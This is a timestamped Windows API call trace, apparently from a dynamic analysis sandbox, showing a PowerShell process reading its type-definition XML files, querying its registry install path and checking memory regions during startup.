	[0110.807] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2b0 | out: lpFileInformation=0xcd2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0110.807] SetErrorMode (uMode=0x1) returned 0x1
	[0110.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0110.807] SetErrorMode (uMode=0x1) returned 0x1
	[0110.807] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2b0 | out: lpFileInformation=0xcd2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0110.807] SetErrorMode (uMode=0x1) returned 0x1
	[0110.808] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.808] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.809] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0110.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.809] CoTaskMemFree (pv=0x1b8470b0) 
	[0110.810] GetACP () returned 0x4e4
	[0110.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0110.816] SetErrorMode (uMode=0x1) returned 0x1
	[0110.817] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0110.817] SetErrorMode (uMode=0x1) returned 0x1
	[0110.817] GetFileType (hFile=0x334) returned 0x1
	[0110.819] ReadFile (in: hFile=0x334, lpBuffer=0x2e4fdb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e4fdb8*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0110.821] ReadFile (in: hFile=0x334, lpBuffer=0x2e4fdb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e4fdb8*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0110.821] ReadFile (in: hFile=0x334, lpBuffer=0x2e4fdb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e4fdb8*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0110.822] ReadFile (in: hFile=0x334, lpBuffer=0x2e4fdb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e4fdb8*, lpNumberOfBytesRead=0xcd1e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0110.822] ReadFile (in: hFile=0x334, lpBuffer=0x2e4f213, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e4f213*, lpNumberOfBytesRead=0xcd1e8*=0x0, lpOverlapped=0x0) returned 1
	[0110.822] ReadFile (in: hFile=0x334, lpBuffer=0x2e4fdb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e4fdb8*, lpNumberOfBytesRead=0xcd1e8*=0x0, lpOverlapped=0x0) returned 1
	[0110.823] CloseHandle (hObject=0x334) returned 1
	[0110.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0110.825] SetErrorMode (uMode=0x1) returned 0x1
	[0110.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd160 | out: lpFileInformation=0xcd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0110.825] SetErrorMode (uMode=0x1) returned 0x1
	[0110.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0110.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd248 | out: phkResult=0xcd248*=0x334) returned 0x0
	[0110.855] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd1cc, lpData=0x0, lpcbData=0xcd1c8*=0x0 | out: lpType=0xcd1cc*=0x1, lpData=0x0, lpcbData=0xcd1c8*=0x56) returned 0x0
	[0110.855] CoTaskMemAlloc (cb=0x5a) returned 0x238fe0
	[0110.855] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd19c, lpData=0x238fe0, lpcbData=0xcd198*=0x56 | out: lpType=0xcd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd198*=0x56) returned 0x0
	[0110.855] CoTaskMemFree (pv=0x238fe0) 
	[0110.856] RegCloseKey (hKey=0x334) returned 0x0
	[0110.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0110.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0110.873] GetSystemInfo (in: lpSystemInfo=0xcbe80 | out: lpSystemInfo=0xcbe80*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0110.873] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0110.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0110.884] SetErrorMode (uMode=0x1) returned 0x1
	[0110.885] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0110.885] GetFileType (hFile=0x334) returned 0x1
	[0110.885] SetErrorMode (uMode=0x1) returned 0x1
	[0110.885] GetFileType (hFile=0x334) returned 0x1
	[0111.101] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.102] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.102] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.103] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.103] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.103] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.103] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.103] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.103] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.108] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.109] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.109] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.109] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.109] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.110] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.110] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.110] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.112] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.112] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.113] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.113] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.113] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.113] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.114] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.114] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.114] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.114] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.115] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.115] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.115] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.115] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.116] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.116] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.119] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.119] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.119] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.120] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.120] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.120] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.120] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.121] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0111.121] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0111.121] ReadFile (in: hFile=0x334, lpBuffer=0x2d15608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2d15608*, lpNumberOfBytesRead=0xcd1e8*=0x0, lpOverlapped=0x0) returned 1
	[0111.121] CloseHandle (hObject=0x334) returned 1
	[0111.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0111.122] SetErrorMode (uMode=0x1) returned 0x1
	[0111.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd160 | out: lpFileInformation=0xcd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0111.122] SetErrorMode (uMode=0x1) returned 0x1
	[0111.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0111.122] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd248 | out: phkResult=0xcd248*=0x334) returned 0x0
	[0111.122] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd1cc, lpData=0x0, lpcbData=0xcd1c8*=0x0 | out: lpType=0xcd1cc*=0x1, lpData=0x0, lpcbData=0xcd1c8*=0x56) returned 0x0
	[0111.122] CoTaskMemAlloc (cb=0x5a) returned 0x1ae5e0
	[0111.122] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd19c, lpData=0x1ae5e0, lpcbData=0xcd198*=0x56 | out: lpType=0xcd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd198*=0x56) returned 0x0
	[0111.122] CoTaskMemFree (pv=0x1ae5e0) 
	[0111.122] RegCloseKey (hKey=0x334) returned 0x0
	[0111.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0111.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0111.291] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.294] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.295] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.295] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.296] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.296] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.296] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.298] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.302] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
